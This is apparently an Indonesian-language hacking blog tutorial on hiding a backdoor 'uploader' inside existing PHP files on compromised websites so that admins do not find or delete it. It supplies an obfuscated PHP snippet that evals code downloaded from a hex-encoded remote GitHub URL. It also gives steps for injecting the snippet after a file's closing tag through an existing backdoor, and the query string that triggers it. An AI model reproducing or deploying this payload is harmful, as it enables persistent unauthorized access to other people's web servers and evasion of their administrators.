PHP Hidden Uploader. Sesuai namanya pastinya dah tau dong fungsinya apa. dilatar belakangi kasus shell backdoor yang sering kena tikung atau di delete admin web. ada solusi lain untuk tanam backdoor, yaitu dengan menyisipkan hidden uploader.
Simpelnya, ini adalah script php yang disisipkan ke file yang berformat .php,
.phtml, dan file yang memuat php language program, sehingga kamu dapat
mengaksesnya tanpa membuat file baru ataupun menampakkan uploader terang
terangan pada halaman website. Tenang saja script ini anti
500 Internal Server Error ataupun tersisipi Logger yang membagongkan.
Kalian tinggal copy paste script dibawah ini
<?php
goto Ya56r; Ya56r: echo @null; goto yYSYb; yYSYb: @eval("\x3f\x3e" . file_get_contents("\x68\164\x74\x70\163\72\x2f\x2f\x72\x61\x77\56\147\x69\164\150\165\142\x75\163\x65\162\x63\157\x6e\164\x65\x6e\164\56\143\157\x6d\x2f\106\122\x4d\x46\117\x58\57\x53\110\63\x4c\x4c\x2d\x42\x4b\x44\x52\x2f\x6d\141\151\156\57\x75\160\56\x70\150\x70")); goto XQ3LS; XQ3LS: ?>
Ingat, kalian pasang script ini pada file / direktori yang bisa di upload maupun edit (dir ijo) supaya bisa dieksekusi
Cara Pasang
Kalian bisa menyisipkannya pada file berformat .php atau format apapun yang memuat program berbahasa php. Supaya aman bagi kalian yg awam, tinggal pastekan script ini di belakang tag akhir file php ( ?> ) . untuk contohnya seperti berikut, kalian inject filenya melalui backdoor yang sudah tertanam.
Cara Panggil
Kalian tinggal menambahkan ?66=lum77 dibelakang nama file yang sudah kamu inject sehingga menjadi seperti ini.
Oke, sekian dulu untuk Cara menyisipkan Hidden uploader di file PHP. semoga dapat menambah pengetahuan kamu.